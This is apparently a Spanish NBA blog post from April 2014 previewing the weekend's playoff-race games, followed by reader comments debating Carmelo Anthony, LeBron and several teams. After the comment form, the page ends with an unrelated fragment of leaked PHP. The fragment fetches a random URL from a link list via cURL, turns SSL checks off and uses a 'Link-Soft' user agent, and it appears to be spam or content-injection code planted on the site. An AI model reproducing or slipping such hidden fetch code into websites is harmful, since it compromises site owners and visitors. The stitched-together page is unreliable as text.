Fin de semana: Quedan 2

04 de April de 2014 por TheDeerHunter

Queda un suspiro de regular y nuestro interés lleva centrándose en conocer quienes van a estar presentes en el camino hacia el título. Veamos qué nos espera durante el fin de semana en este sentido.

Viernes: Brutal. Entran en juego todos los interesados. Los Grizzlies (1AM) abren la batalla, con déficit sobre los que les exigíamos y recibiendo a un incómodo rival como Nuggets, a los que lograron vencer con grandes apuros en Denver al principio de semana. Por suerte para ellos a última hora los Suns continuarán con su particular viacrucis en Portland (4AM) quienes han recuperado el tono y apuntan a recuperar la parte alta del cuadro. Después los Mavs visitan el Staples, sin Pau por los mareos que lleva sufriendo. Defendiendo la 4ª, los Rockets reciben a los Thunder, que ya jugaron anoche. Los Warriors ciñéndose prácticamente seguro a la 6ª del Oeste reciben a los Kings.
En el Este los Hawks no pueden fallar ante Cavs (1:30AM) y esperan un favor de los Wizards en su visita al Madison a la misma hora. Tanto los propios Wizards, como los Nets (que reciben a Pistons), como Chicago (a Bucks) y los Raptors (en casa ante unos ahora asequibles Pacers) prácticamente tienen asegurados los cruces intermedios entre ellos, evitando a Heat y Pacers en primera ronda. Los Bobcats no pueden fallar ante Orlando si quieren mantener su esperanza de aguarle a alguno de ellos la fiesta.
Terminando con la jornada los Heat reciben a los Wolves, quienes les ha dado últimamente por meterse de jueces en algunas causas ajenas y tanto el Sixers@Celtics como el Pelicans@Jazz intrascendentes.

El sábado juegan casi exclusivamente los implicados en el lío del Este. Todos, como decimos, en back-to-back. Los 4, llamémosle de segunda fila de salida (Wizards, Bulls, Raptors, Nets) más lo Bobcats que aún podrían estar en condiciones de evitar a los dos teóricos cocos. Previsiblemente serán estos los que más se juegan en Cleveland. Vital que logren esa tercera victoria consecutiva que les pedíamos si pretenden inquietar a Washington. Éstos se disputan el plato fuerte de la noche recibiendo a Bulls y tanto los Nets como los Raptors visitan canchas fáciles como el Wells Fargo de Philadelphia o el Harris Bradley Center de Milwaukee. La dosis de “amistosos” del día la cubren Wolves@Magic y Celtics@Pistons.

El domingo también sería día de esos de carrusel y transistores de aquí. Los Knicks afrontarán su examen más complicado ante los campeones en Miami, además en estupendo horario para nosotros (7PM) mientras los Hawks tampoco lo deberían tener fácil en su visita a Indianapolis (12AM) En el Oeste serán Memphis (1AM) y Suns (3AM) los que las pasarán de Caín para doblegar a Spurs y Thunder, jugando los osos a domicilio. Los Mavericks lo tendrán más sencillo en su visita a Sacramento.
La zona noble de la conferencia también serán de la partida esta jornada. A Spurs y Thunder que ya hemos nombrado hay que añadir el desequilibrado derbi angelino, los Rockets recibiendo a Nuggets, Warriors a Jazz y Blazers a Pelicans, cerrando una jornada sin desperdicio.

Ya queda poco. A disfrutarlo.

Comenta

15 comentarios a esta entrada

  1. jhc dice:
    #1

    muy apretada la lucha por los ultimos puestos de play-off en ambas conferencias, victoria importante de Atlanta sobre Cleveland que practicamente se quita de la lucha salvo catastrofe de Hawks o de unos Knicks que cayeron anoche contra Wizards con varios fallos de Carmelo que le costaron el partido a Knicks, viendo el calendario de Knicks y Hawks veo a los segundos un poquito por encima

    en el oeste sigue la lucha encarnizada entre Dallas, Memphis y Phoenix anoche victorias de Dallas sobre Lakers, Mmemphis sobre Denver y una meritoria victoria de los Suns contra Portland, la lucha será emocionante hasta el final

      Citar

  2. Denise dice:
    #2

    Poco les duró a los Knicks el asiento en Playoffs. Dejavu. Vuelven a perder en casa por un punto contra Washington, otra vez con Beal de verdugo, y otra vez con Melo demostrando que es un perdedor y que a Lebron y a Durant no les llega ni a la altura de la uña del pie.

    En el Oeste ganaron los 3 (Memphis, Suns y Mavs) que aspiran a las ultimas plazas de PO. La más meritoria de ellas, la victoria de Phoenix en casa de los Blazers, con el saltarín Gerald Green demostrando eso, que no solo es un saltarín tipo Desmond Mason, sino que también es un jugadorazo de baloncesto. 32 puntos, siendo secundado por Bledose y Dragic (32 y 30).

    En el partido estrella de la jornada, los Rockets ganaron sin Howard a OKC, con 39 puntos de Harden, gracias también a los 20 tiros libres que tiró, exactamente igual que todo el equipo entero de Oklahoma. Por los Thunder, que no pudieron contar con Westbrook, Durant iguala a Jordan con 40 partidos seguidos metiendo 25 puntos o más.

    La sorpresa de la jornada, la derrota de Miami en casa tras 2 prorrogas contra los Wolves. El triple de Ray Allen en el último segundo, esta vez no entró y los lobos se llevaron la victoria gracias a un gran Love (28-11) y un Dieng que volvió a suplir bien a Pekovic y de haber jugado así de primera hora, estaría luchando por el ROY.

      Citar

  3. Esteban dice:
    #3

    lo de green es extraño, a sus 28 años, toda una carrera en el basquet no solo nba sino mundial, solo pareció un saltarin que lo saco de la liga, jugo en rusia creo, y lo mando a los 26 años a la liga de desarrollo

    una explosión así a esa edad poquisimas veces se ve

      Citar

  4. rumbero dice:
    #4

    Palman los Knicks en Florida pero JR nos deja un record muy suyo : 22 triples intentados en un partido

      Citar

  5. Denise dice:
    #5

    rumbero:
    Palman los Knicks en Florida pero JR nos deja un record muy suyo : 22 triples intentados en un partido

    Y Melo cagandose y peyendose en los pantalones ante el mejor jugador del mundo, el Sr. James.
    El partido se ha roto a mediados del tercer cuarto y finales del último. Pues bien, en ese tramo de unos 8-9 minutillos, Lebron habrá metido como 16 ó 18 puntos más o menos de los 38 con los que ha acabado, mientras Melo se ha inflado a fallar anotando solo un tirillo y gracias.

    Fans de Melo, aceptadlo. Este tio no vale como jugador franquicia para ganar un anillo, quizas ni como 2º espada. Al final acabará en Houston tras Harden y Howard….., la unica manera que tiene de ganar un anillo.
    Tiene mucho talento ofensivo, tanto que le puede dar para hacer 10 partidos de 40 puntos al año, ó poder ser maximo anotador, pero en los momentos decisivos donde se distinguen los hombres de los niños, Melo demuestra que se raja contra los mas grandes y no es capaz de involucrar ni mejorar a los compañeros que tiene alrededor. Y atrás es un vago de cojones.

      Citar

  6. Denise dice:
    #6

    Los Clippers al descanso ganando cómodamente a Lakers con rentas de hasta 13 puntos. Griffin si quiere y Doc Rivers le da minutos y tiros, puede meter 40 puntos perfectamente porque Ryan Kelly ni lo huele. Y DeAndre Jordan….es verdad que ha mejorado un montón este año, reboteando y poniendo pinchos es muy bueno, pero en el 1×1 sigue siendo un mal defensor y no puede ser que un mequetrefe como Jordan Hill le coma la tostada tantas veces.

      Citar

  7. Jose Luis dice:
    #7

      Citar

  8. Jose Luis dice:
    #8

    ah, ahora si xddddd yo no me considero Carmelista, de hecho me gusta poco y no quiero que venga a los Lakers… pero ese artículo lleva buena parte de razón.

    El vídeo, me encanta, además lo viví en directo desde el pc.

      Citar

  9. nba dice:
    #9

    Ojito con llamar mequetrefe a Hill, que es de lo poco salvable de estos Lakers de pesadilla.
    No sera un dechado de virtudes tecnicas, pero es de los pocos que les pone ganas cuando esta en pista

      Citar

  10. Denise dice:
    #10

    Jose Luis:
    ah, ahora si xddddd yo no me considero Carmelista, de hecho me gusta poco y no quiero que venga a los Lakers… pero ese artículo lleva buena parte de razón.

    El vídeo, me encanta, además lo viví en directo desde el pc.

    A mi el artículo no me gusta. Me explico.
    Lo del high-school y la Universidad me lo paso por el forro, porque hay cientos de tios que cuando son menores de edad en el instituto son la hostia y despues cuando llegan a profesionales, nada de nada. ¿Cómo se llamaba ese buen hombre que metió 100 puntos en un partido de high-scholl y en la NBA no se comió un rosco? No sé que Wagner…ó algo así?
    Después, el articulo miente
    No me jodas, ¿que no tenia Melo un equipazo en Denver? Que drogas ha tomado ese hombre? Carmelo tenía un equipazo en Denver, con Iverson y BIllups que según el articulo estaba en declive!!! y metían casi 30 puntos por partido el primero (en modo cancerigeno, pero los metía), y 18 el segundo, tenía a Camby y a Kenion Martin, ambos siempre haciendo dobles-dobles, tenía a Nené Hilario, a JR Smith, y luego a un puñado de jugadores de rotación muy aprovechables como Steve Blake, Kleiza, Reggie Evans, Lenteja Boykins, el pájaro Andersen… este equipo debería haber jugado la final.

    En los Knicks, el primer año jugaba al lado de Billups metriendo 17 puntos de media, y Amare aun era bueno, yendose al 25-8 ese año, más Fields y Douglas que en aquellos años parecían buenos. No era para ganar el anillo pero nunca ha estado rodeado de paquetes.

    Y Lebron, por mucho que pese al del articulo y a sus haters, llevó a una mierda de equipo como los Cavs cuyos mejores jugadores tras él eran Ilgauskas y Varejao!!!

    Respecto al video, por una vez que Melo haya hecho algo ante Lebron, este se le ha meado 5 veces,

      Citar

  11. Denise dice:
    #11

    Denise:

    Y Lebron, por mucho que pese al del articulo y a sus haters, llevó a una mierda de equipo como los Cavs cuyos mejores jugadores tras él eran Ilgauskas y Varejao!!!

    Los llevó a la final quería decir.
    Y por cierto, el de los 100 puntos se llamaba Dajuan Wagner, número 5 del Draft de 2002 y retirado pese a que solo tiene 31 años.

      Citar

  12. Denise dice:
    #12

    nba:
    Ojito con llamar mequetrefe a Hill, que es de lo poco salvable de estos Lakers de pesadilla.
    No sera un dechado de virtudes tecnicas, pero es de los pocos que les pone ganas cuando esta en pista

    Hilla no es un paquete ni mucho menos, es un jugador muy productivo y util en la rotación de un equipo. Le digo mequetrefe, en el sentido de que ofensivamente es un jugador muy limitado y cuyos puntos llegan mas por la brega y la garra que por la calidad, y ahí está haciendole un hijo a DeAndre Jordan.
    Aparte del partido de hoy, sus números (como los de todos los Lakers) están muy hinchados debido al sistema D’Antoni y a la cantidad de minutos de la basura que juegan y a la poca calidad que hay en la plantilla, que hace que un tio como Hill que en un buen equipo no lanzaría mas de 5 tiros, en Lakers tire lo que quiera.

    Por cierto, acaba de anotar Hill otra canasta, esta vez ya ante los suplentes de los Clippers, porque el derbi angelino ha pasado a ser un solteros/casados y a falta de casi todo el último cuarto, los Clippers ganan de 20. Los titulares de Clippers no creo que vuelvan a salir a pista, 23-7 para Griffin, 23-6 para Paul, y 15 para Redick que ha vuelto bastante bien para haber estado 2 meses inactivo.
    Ahora serán buenos minutos para que Big Baby Davis se pueda hinchar a meter puntos. El partido ya es un asco y me voy a acostar.

      Citar

  13. rumbero dice:
    #13

    Es terrible lo de los Pacers. Perdiendo de casi 30 en casa contra Hawks y dando auténtica lástima. No es normal.
    Sigo confiando en ellos pero a cada partido que pasa da la sensación que se la van a pegar en PO

      Citar

  14. Jose Luis dice:
    #14

    Denise, Iverson y Billups no pudieron jugar juntos, si uno fue traspasado por el otro xD

    Ese equipo de Denver no valía tanto, la verdad, aunque a mi no me gusta Carmelo. Kleiza era de los jugadores que jugaba, por dios xD

    Fijate el equipito… Nene de pívot, que es un 4 y nunca ha sido all-star. Danthay Jones de escolta titular! Y desde el banco Anthony Carter y Kleiza, en una rotación de 9 tíos… Andersen y Smith eran los otros dos.

    Kenyon Martin promedió esa temporada 12p 6r. Nené 15p 8r. No sé, buen equipo, aspirante… y de hecho jugaron una final de Conferencia perdiendo contra los Campeones de ese año.

      Citar

  15. Esteban dice:
    #15

    rumbero:
    Es terrible lo de los Pacers. Perdiendo de casi 30 en casa contra Hawks y dando auténtica lástima. No es normal.
    Sigo confiando en ellos pero a cada partido que pasa da la sensación que se la van a pegar en PO

    es un caso para el psicologo realmente, ultimamente pierden casi todos sus juegos, en una serie a 7 con los bobcats, me duele decirlo, pero los de Jordan son mas candidatos al dia de hoy

    indiana paso de tener el mejor record de la liga, a compartir la SEXTA posicion con los rockets, de los ultimos 10 juegos, tienen el peor record de los equipos de PO junto con atlante con un 3-7

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>